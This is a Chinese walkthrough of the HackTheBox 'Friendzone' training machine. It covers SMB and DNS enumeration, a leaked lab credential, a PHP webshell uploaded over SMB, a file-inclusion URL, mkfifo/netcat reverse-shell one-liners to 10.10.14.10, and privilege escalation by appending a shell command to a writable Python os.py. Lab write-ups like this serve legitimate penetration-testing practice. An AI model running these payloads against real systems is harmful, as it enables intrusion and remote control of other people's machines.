HTB-Friendzone靶场

简介: HTB-Friendzone靶场

端口扫描

nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123


目录扫描

不清楚是什么,密码?cms?

smb漏洞扫描

enum4linux 10.10.10.123

    more creds.txt

    640.png

    发现了登陆密码

    admin:WORKWORKHhallelujah@#

    回头看,443端口是404,但是开了53端口,查看证书发现了一个域名

    640.png

    子域名目录扫描

    dirsearch https://friendzone.red/

    640.png

    base64解密也灭发现什么

    又把目标转到dns上了

    dig axfr friendzone.red @10.10.10.123

    640.png

    这些域名写入hosts

    文件包含

    然后挨个尝试

    密码就是smb里查到的admin

    让访问dash文件

    有点像文件包含漏洞,读passwd 没显示

    640.png

    当我读取login页面,发现成功了

    说明存在文件包含,这时登陆smb,写一个webshell,然后监听

    smb写文件

    但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file

    这里可使用nmap脚本进行探测

    nmap --script smb-enum-shares.nse -p445 10.10.10.123


    cat cmd.php
    <?php systems($_REQUEST['cmd']);?>
    smbclient  //10.10.10.123/Development -c 'put cmd.php 1.php'

    640.png

    文件包含,还是相对路径使用?传参数就不成功换成&就OK了

    https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id

    反弹shell

    https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/f

    root提权

    信息收集,使用pspy64 在opt下发现脚本文件

    640.png

    查询可写文件

    cd /usr/lib/python2.7
    find  -type f -writable -ls

    发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell

    echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py

    总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。


    相关文章
    |
    11天前
    |
    XML 存储 安全
    w1r3s 靶机学习
    w1r3s 靶机学习
    |
    11月前
    |
    安全 Unix Shell
    CTF靶场练习
    翻了翻自己的文档,看见有一篇之前打CTF练习留下的文章,对文章做了修整,然后正文如下: 开始对目标进行了一波信息搜集,端口只开放了80端口,其他端口并不是很有帮助,不得不提nmap的协议识别功能非常好用,并且还自带扫目录的功能。
    131 0
    |
    11月前
    |
    安全 PHP
    pikachu靶场通关秘籍之文件上传攻击
    pikachu靶场通关秘籍之文件上传攻击
    234 0
    |
    11月前
    |
    SQL 安全 关系型数据库
    pikachu靶场通关秘籍之sql注入攻击
    pikachu靶场通关秘籍之sql注入攻击
    269 0
    |
    11月前
    |
    PHP
    pikachu靶场通关秘籍之文件包含攻击
    pikachu靶场通关秘籍之文件包含攻击
    88 0
    |
    11月前
    pikachu靶场通关秘籍之越权攻击
    pikachu靶场通关秘籍之越权攻击
    194 0
    |
    11月前
    |
    Windows
    pikachu靶场通关秘籍之命令执行攻击
    pikachu靶场通关秘籍之命令执行攻击
    89 0
    |
    11月前
    |
    JavaScript
    pikachu靶场通关秘籍之跨站脚本攻击
    pikachu靶场通关秘籍之跨站脚本攻击
    97 0
    |
    安全 Shell 数据库
    ColddBox 靶场
    渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
    85 0
    ColddBox 靶场
    |
    Java 关系型数据库 MySQL
    pikachu 启航篇之靶场环境准备
    pikachu 启航篇之靶场环境准备
    143 0
    pikachu 启航篇之靶场环境准备